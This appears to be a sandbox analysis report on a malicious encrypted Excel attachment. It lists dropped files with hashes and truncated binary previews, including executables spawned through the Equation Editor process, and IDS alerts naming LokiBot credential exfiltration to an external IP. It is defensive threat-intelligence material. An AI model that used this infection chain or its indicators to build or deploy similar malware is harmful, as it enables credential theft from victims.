                        Preview:.PNG........IHDR.............<.q.....IDATx..Yo.......}.B.Z-9.";r..F..A..h....)z.~.~. .M......ia..]'Qc[ri.Dm.%R.>.9..S[.B....yn$.y.yg...9.y.{..i.t..ix<.N.....Z......}.H..A.o..[..\Gm..a....er.m....f!....$133..."...........R..h4.x.^.Earr.?..O..qz{{..........322...@Gm..y.?~L2..Z...:....0p..x<..n7.p.z..G....@.uVVV....t....x.vH<...h...J...h.(..a...O>.GUU....|.2..\ ..........p....q..P..............(.....0p.\<~..x<...2.d...E..:.H.+.7..y...n.&.i"I.{.8..-..o......q.fX.G....... .%.....f.........=.(.|>.....===<x....!L.$..R.........:.....Bww7.h...E.^G.e.^/..R(.H$....TU%...v._.]..ID....N'..=bdd..7oR..i6...a..4g.....B.@&......|>...?299I&.!....:....nW.4...?......|..G..I....+......@WW..J.d2.......&.J155u.s>..K....iw.@..C.$<.....H$...D.4...... ....Fy..!.x....W_}.O..S<...D...UUeii.d2.....T...O.Z.X,.....j..nB....Q..p8..R..>.N..j....eg.....V.....Q.h4.....$I"...u..m.!.... ..1*...6.>.....,....xP......\.c.&.x.B.@$.!.Ju4.z.y..1.f.T*.$I.J%....u.......qL.P(..F.......*....\....^..

                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9D560E8D.png

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                        Category:dropped
                        Size (bytes):2647
                        Entropy (8bit):7.8900124483490135
                        Encrypted:false
                        SSDEEP:48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
                        MD5:E46357D82EBC866EEBDA98FA8F94B385
                        SHA1:76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
                        SHA-256:B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
                        SHA-512:8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
                        Malicious:false
                        Preview:.PNG........IHDR.............../....EPLTE.......................o...ttu`aaLML.s;.../-,................~_)$....IDATx..].b.*....Y\.....o..4...bl.6.1...Y.".|.2A@y.../...X.X..X..2X.........o.Xz}go.*m..UT.DK...ukX.....t.%..iB......w.j.1].].m....._)T...Z./.%.tm..Eq...v...wNX@.I..'$CS:e.K.Un.U.v......*.P.j. .5.N.5,..B]....y..2!..^.?...5..A...>"....)...}.*.....{[e4(.Nn....x.,....t.1..6.....}K).$.I.%n$b..G.g.w.....M..w..B.......tF".YtI..C.s.~)..<@"......-..._.(x...b..C..........;5.=.......c...s.....>.E;g.#.hk.Q..g,o;Z`.$.p&.8..ia...La....~XD.4p...8......HuYw.~X.+&Q.a.H.C..ly..X..a.?O.yS,C.r..........Xbp&.D..1.....c.cp..G.....L.M..2..5...4..L.E..`.`9...@...A.....A.E;...YFN.A.G.8..>aI.I.,...K..t..].FZ...E..F....Do../.d.,..&.f.e!..6.......2.;..gNqH`...X..\...AS...@4...#.....!D}..A_....1.W..".S.A.HIC.I'V...2..~.O.A}N........@K.B./...J,.E.....[`I>.F....$v$...:,..H..K.om.E..S29kM/..z.W...hae..62z%}y..q..z...../M.X..)....B eC..........x.C.42u...W...7.7.7

                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A4FBAD23.png

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
                        Category:dropped
                        Size (bytes):5396
                        Entropy (8bit):7.915293088075047
                        Encrypted:false
                        SSDEEP:96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
                        MD5:590B1C3ECA38E4210C19A9BCBAF69F8D
                        SHA1:556C229F539D60F1FF434103EC1695C7554EB720
                        SHA-256:E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
                        SHA-512:481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
                        Malicious:false
                        Preview:.PNG........IHDR.............<.q.....IDATx..Yo.......}.B.Z-9.";r..F..A..h....)z.~.~. .M......ia..]'Qc[ri.Dm.%R.>.9..S[.B....yn$.y.yg...9.y.{..i.t..ix<.N.....Z......}.H..A.o..[..\Gm..a....er.m....f!....$133..."...........R..h4.x.^.Earr.?..O..qz{{..........322...@Gm..y.?~L2..Z...:....0p..x<..n7.p.z..G....@.uVVV....t....x.vH<...h...J...h.(..a...O>.GUU....|.2..\ ..........p....q..P..............(.....0p.\<~..x<...2.d...E..:.H.+.7..y...n.&.i"I.{.8..-..o......q.fX.G....... .%.....f.........=.(.|>.....===<x....!L.$..R.........:.....Bww7.h...E.^G.e.^/..R(.H$....TU%...v._.]..ID....N'..=bdd..7oR..i6...a..4g.....B.@&......|>...?299I&.!....:....nW.4...?......|..G..I....+......@WW..J.d2.......&.J155u.s>..K....iw.@..C.$<.....H$...D.4...... ....Fy..!.x....W_}.O..S<...D...UUeii.d2.....T...O.Z.X,.....j..nB....Q..p8..R..>.N..j....eg.....V.....Q.h4.....$I"...u..m.!.... ..1*...6.>.....,....xP......\.c.&.x.B.@$.!.Ju4.z.y..1.f.T*.$I.J%....u.......qL.P(..F.......*....\....^..

                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B2EFEB2A.jpeg

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
                        Category:dropped
                        Size (bytes):4396
                        Entropy (8bit):7.884233298494423
                        Encrypted:false
                        SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
                        MD5:22FEC44258BA0E3A910FC2A009CEE2AB
                        SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
                        SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
                        SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
                        Malicious:false
                        Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&...c@K.AO.*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.

                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DFF43294.jpeg

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
                        Category:dropped
                        Size (bytes):4396
                        Entropy (8bit):7.884233298494423
                        Encrypted:false
                        SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
                        MD5:22FEC44258BA0E3A910FC2A009CEE2AB
                        SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
                        SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
                        SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
                        Malicious:false
                        Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&...c@K.AO.*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.

                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F6DBF9C2.png

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                        Category:dropped
                        Size (bytes):11303
                        Entropy (8bit):7.909402464702408
                        Encrypted:false
                        SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                        MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                        SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                        SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                        SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                        Malicious:false
                        Preview:.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....

                        C:\Users\user\AppData\Local\Temp\2v0cucir72x

                        Download File
                        Process:C:\Users\Public\vbc.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):219608
                        Entropy (8bit):7.9897314726108535
                        Encrypted:false
                        SSDEEP:3072:HeVPHh1pYGP+TmX9fEv0W8Uc3pLmEavCycHI77blslGnM4Xryc7oxwdO8cRMJa3m:HeVfhf2uUSad7io3r2xGO8cRMYNrG+i
                        MD5:AC8E973D953305B03019CDB74006099C
                        SHA1:7976E0BE0FC69E238DAF16DB2BFF833340536C4E
                        SHA-256:2F62F941918151FCED3AD854B37DCDA1E40E91432D772781EBC2118E28987B41
                        SHA-512:3719354FA157A48C919AC13D1DA71DF1142D24448462355B83BD52FC3D3B8F8BF39E052FAFA3E9A961B3ED200FBBE8BD5C84716B9782392C75EFF34ADFFF38AB
                        Malicious:false
                        Preview:.:L...at.(.i.;T.7.......fRp.C..+.`..#......4.]./.sI.E.<.....2....HP.}.J..H.T.....4....Q%M.[.p}.).!x.Y.e.z.b..E......F.3.T.6.:.Y`...^.......{[...M.GM..h.4T.y...g.5.88M..78.g.-_........;._... ..9.Rz.....2...4L..dd.g.*%F...."n.]..L:.k.Wn.&............k...=....R[..di..@...^......%p....+x+..#...a..4!]....I.E.f.@...2.q.R.P./.-........A ...x.....;.c..5.5...s..~?^.....w.D...3.T.6..'d....GAy.N.9.}..F.. zk.!$....yG...<....d.....#..*1K5wD.'ZYU.d...o..........N...e.0...q}j=..U...<....B.Wn.......g...2+.{...=..p.at.(.i'.T..........Rp...+&`...x.....4.]./.sIiE.....^..2.jH.P.3.-...*..A....x.....@.c..(.5...s..~?^..E<.wd.....3.T.6..'d...vGAy.N.9.}..F.. zk.!$....yG...<....d.....#..*1K5wD.'ZYU.d...o.1o.......N...e.0...q}j=..U...<.L:.k.Wn.@.....g..P.+.k...=..p.at.(.i..T.......YfRp.C..+.`..#......4.]./.sI.E.<.....2.q...P./.-.......A....x.....;.c..5.5...s..~?^..E..wd.D...3.T.6..'d....GAy.N.9.}..F.. zk.!$....yG...<....d.....#..*1K5wD.'ZYU.d...o.1o.......N...e.0...q}j=..U...<.

                        C:\Users\user\AppData\Local\Temp\npotbzd

                        Download File
                        Process:C:\Users\Public\vbc.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):4858
                        Entropy (8bit):6.17383796672968
                        Encrypted:false
                        SSDEEP:96:nt0EwCLn8tWfofJ1QSZe8ozFieNdFhpQbxxszw8PX/9LOz8AQK:t5n8kUHQSwFieNdFhGbH8PXIz8AQK
                        MD5:CB3FBCC52C7B5805ACF1F81D65488D89
                        SHA1:EAD5B088DA9F7466D9E10537A449A2F8C7505E85
                        SHA-256:05FB79420AADA2C2199CABAD68F4D6483127D2D803A5FD4E755008E78A977931
                        SHA-512:9CFB8EA161797F5131AC4780CBEE9FB8E56FADEEEBEC7D39BFC96416F1949D5E0247FA0F7B1E71C415BC9A08CCE1AAFF4003BBA9221CFB7F77A629794F8933CD
                        Malicious:false
                        Preview:..z.......U.......b..bf,5b..bf,.....:,.].........a..e.,.......,..1..a..e.,.......,%.)..a..e.,..&....,=.!..a..e.,.......,...de..+.}.....,a..,5.9.,e...F .,....,.......F#.e....,........,.......9..F.......y.>^........%...=X....X...5.....l..e...a...u........X..,}b..,.........:Yy.v.....yt>......,........a......b..bf,..,}...,a.u.,}....e.i....Y...,..,}..U..}...,........a..g...m.........i....2............}..t.............}......]b..bf,.:,.e....,..,..d...g.,.....,.U.,..,..,..9.i...l.W.,}.}.. ..Yt..t1.,..}..8..Yt..t1...}.....Y......2..(.....?....,..b.,....}......,..d.........z:,......,............Ub..bf,.:,.]....,..,..d...g.,.....,.U.,..,..,..9.....l.b......,}.}.. ..Yt..t..,a.}..8..Yt..t..,e.}.(8.Yt..t..,iF .}..#..Y|..|..,..}..8..Yt..t..}.....Y...g...7.....6....,..dM..}.,...M...J..M..i..e..a..}.*....,..d.........z:,......,.....i......q:,.e....,9.,..d...g.,.....,.U.,..,..,..9.....l.W.,}.}.. ..Yt9.t..,a.}..8..Yt9.t....}.....Y.9..t...Z.....y....,.....

                        C:\Users\user\AppData\Local\Temp\nsk9C03.tmp

                        Download File
                        Process:C:\Users\Public\vbc.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):354872
                        Entropy (8bit):7.605710868367885
                        Encrypted:false
                        SSDEEP:6144:oIeVfhf2uUSad7io3r2xGO8cRMYNrG+ehVpsA7bejlOmKCS:OhfZ07isKRZrleV7/+4mKCS
                        MD5:EE5B2397743F917D9F93DF1631178B23
                        SHA1:2F039C1927989531F121F34D6BF43DEB5703405E
                        SHA-256:6B105FD88793034BDD4A7B6A45E7EC131C36C20D8FAABC4B4AEA557C905C73D5
                        SHA-512:82DB48AE41CC1A0069CDDC2B9A5E28E9197521C59EA580500C577F39B5B3D0D7F4D8EEF186204FB33C7A12D7627F949BEE98890CC9F07E91182740B860E37D85
                        Malicious:false
                        Preview:V.......,...................C...................V...........................................................................................................................................................................................................................................J...............h...j...............................................................................................................................>...........!...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\xmtxpy.exe

                        Download File
                        Process:C:\Users\Public\vbc.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):125440
                        Entropy (8bit):6.382878598936808
                        Encrypted:false
                        SSDEEP:3072:8WbTBVpk7JTDA7SbfsejlOmaDjCsOPthVE:jhVpsA7bejlOmKCS
                        MD5:1EACD504E4461F9EE286715997D8A9EE
                        SHA1:64554FE410BB0B335373E99D2F8AA37800F30FDD
                        SHA-256:DE398BE02D5ABE9C8BCE84380AC5303EA00FC00820A50CAD007220F24538B3DE
                        SHA-512:A253CEC08A167F348D84677F6A992AE306F607C9AD9A10EF6AF03288E7D4A158A07056A50A0909E22B1A89B79386EA44C984754018A25817E22FF6167A6A6156
                        Malicious:true
                        Joe Sandbox View:
                        • Filename: RhACfIARBK.exe, Detection: malicious, Browse
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........oa...2...2...2..2...2..2...2..2...2..3...2...2...2...3...2...2...2...3...2Rich...2........PE..L......b.................x........................@..........................@.......o....@.......................................... .......................0......................................p...@............................................text....w.......x.................. ..`.rdata..*K.......L...|..............@..@.data... 0..........................@....rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\~DF4C8DE484D23B018C.TMP

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):512
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3::
                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                        Malicious:false
                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\~DF4CA76D9E63A218F3.TMP

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:CDFV2 Encrypted
                        Category:dropped
                        Size (bytes):191736
                        Entropy (8bit):7.958679742635318
                        Encrypted:false
                        SSDEEP:3072:W3x5yiKm7/AJj6GEOux8NBVuVnDcq3QT0PyYC9v1EFVW3NdR31od+xXfwsRYXn0D:uam7/AJ6GsWBVuV4MaB9voVWdT3iWPws
                        MD5:CF8B307CAA943326EE808BB3CB02DEEE
                        SHA1:705C25ADBDB7B805E47566540B3804EBA178E7DA
                        SHA-256:CBE84E2C523FD51DABB1365DF50415FFC51F8159C36798061742F08BA5D31B9B
                        SHA-512:CFC3AE790C2E17051A4B03214BAEFD44EB30E8601BF8AFD2D711CD197263854E96C19C2486A8838A1971607E09AD6728F6B9D8D982F6395B1FFC7D9C7EB599AA
                        Malicious:false
                        Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                        C:\Users\user\AppData\Local\Temp\~DF77B28016FA4D6C0D.TMP

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):512
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3::
                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                        Malicious:false
                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\~DFAC55491B3B868135.TMP

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):512
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3::
                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                        Malicious:false
                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy)

                        Download File
                        Process:C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):125440
                        Entropy (8bit):6.382878598936808
                        Encrypted:false
                        SSDEEP:3072:8WbTBVpk7JTDA7SbfsejlOmaDjCsOPthVE:jhVpsA7bejlOmKCS
                        MD5:1EACD504E4461F9EE286715997D8A9EE
                        SHA1:64554FE410BB0B335373E99D2F8AA37800F30FDD
                        SHA-256:DE398BE02D5ABE9C8BCE84380AC5303EA00FC00820A50CAD007220F24538B3DE
                        SHA-512:A253CEC08A167F348D84677F6A992AE306F607C9AD9A10EF6AF03288E7D4A158A07056A50A0909E22B1A89B79386EA44C984754018A25817E22FF6167A6A6156
                        Malicious:false
                        Joe Sandbox View:
                        • Filename: RhACfIARBK.exe, Detection: malicious, Browse
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........oa...2...2...2..2...2..2...2..2...2..3...2...2...2...3...2...2...2...3...2Rich...2........PE..L......b.................x........................@..........................@.......o....@.......................................... .......................0......................................p...@............................................text....w.......x.................. ..`.rdata..*K.......L...|..............@..@.data... 0..........................@....rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Roaming\CF97F5\5879F5.lck

                        Download File
                        Process:C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1

                        C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171

                        Download File
                        Process:C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):46
                        Entropy (8bit):1.0424600748477153
                        Encrypted:false
                        SSDEEP:3:/lbWwWl:sZ
                        MD5:3B7B4F5326139F48EFA0AAE509E2FE58
                        SHA1:209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
                        SHA-256:D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
                        SHA-512:C99D99EA71E54629815099464A233E7617E4E118DD5B2A7A32CF41141CB9815DF47B0A40D1A9F89980C307596B53DD63F76DD52CF10EE21F47C635C5F68786B5
                        Malicious:false
                        Preview:........................................user.

                        C:\Users\user\Desktop\~$_2201S_BUSAN_HOCHIMINH_.xlsx

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):165
                        Entropy (8bit):1.4377382811115937
                        Encrypted:false
                        SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                        MD5:797869BB881CFBCDAC2064F92B26E46F
                        SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                        SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                        SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                        Malicious:true
                        Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                        C:\Users\Public\vbc.exe

                        Download File
                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                        Category:dropped
                        Size (bytes):295124
                        Entropy (8bit):7.944502610174892
                        Encrypted:false
                        SSDEEP:6144:ow2pJekU4t1+9AJci0mJVmkzcOsggBk4u9aTTozAlJixJFfDqXR0e:eJekU4zuAJv0mupOtWu9aIcTR0e
                        MD5:7DF1896047D9647D818080DD17563D92
                        SHA1:A7C2BC04EC70C0F439E2A0863096FA7D391F79C5
                        SHA-256:9CBED5EFF56E1C08B6040C8AB4977E76528D59368D9D0550626B5380513ECB7B
                        SHA-512:1558B4573F82B4B6F34E96591A5A4CF4533C30BEC9D65C3BC1435FEB0119F23EB91E5C7E771D58F502199BB3CDE272C3135CD8A8F3944D87E8759D23A340D01D
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................Z..........%2.......p....@..........................................................................s.......................................................................................p...............................text...vY.......Z.................. ..`.rdata.......p.......^..............@..@.data................p..............@....ndata.......@...........................rsrc................t..............@..@........................................................................................................................................................................................................................................................................................................................................................

                        Static File Info

                        General

                        File type:CDFV2 Encrypted
                        Entropy (8bit):7.958679742635318
                        TrID:
                        • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                        File name:_2201S_BUSAN_HOCHIMINH_.xlsx
                        File size:191736
                        MD5:cf8b307caa943326ee808bb3cb02deee
                        SHA1:705c25adbdb7b805e47566540b3804eba178e7da
                        SHA256:cbe84e2c523fd51dabb1365df50415ffc51f8159c36798061742f08ba5d31b9b
                        SHA512:cfc3ae790c2e17051a4b03214baefd44eb30e8601bf8afd2d711cd197263854e96c19c2486a8838a1971607e09ad6728f6b9d8d982f6395b1ffc7d9c7eb599aa
                        SSDEEP:3072:W3x5yiKm7/AJj6GEOux8NBVuVnDcq3QT0PyYC9v1EFVW3NdR31od+xXfwsRYXn0D:uam7/AJ6GsWBVuV4MaB9voVWdT3iWPws
                        File Content Preview:........................>......................................................................................................................................................................................................................................

                        File Icon

                        Icon Hash:e4e2aa8aa4b4bcb4

                        Network Behavior

                        Snort IDS Alerts

                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                        02/10/22-10:21:59.753805TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14916680192.168.2.22172.67.197.66
                        02/10/22-10:21:59.753805TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4916680192.168.2.22172.67.197.66
                        02/10/22-10:21:59.753805TCP2025381ET TROJAN LokiBot Checkin4916680192.168.2.22172.67.197.66
                        02/10/22-10:21:59.753805TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24916680192.168.2.22172.67.197.66
                        02/10/22-10:22:02.840347TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14916780192.168.2.22172.67.197.66
